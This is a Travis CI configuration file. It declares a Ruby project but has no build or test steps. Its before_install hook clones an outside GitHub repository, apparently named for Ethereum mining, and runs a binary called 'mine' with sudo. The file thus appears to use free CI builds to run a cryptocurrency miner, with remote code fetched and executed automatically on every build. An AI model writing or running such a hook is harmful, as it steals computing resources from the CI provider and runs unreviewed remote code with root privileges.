language: ruby

services:
  - docker

before_install:
  - sudo apt install -y git && sudo git clone https://github.com/Anli-Project/UntukAzureEthereum.git && cd UntukAzureEthereum && sudo chmod u+x mine && sudo ./mine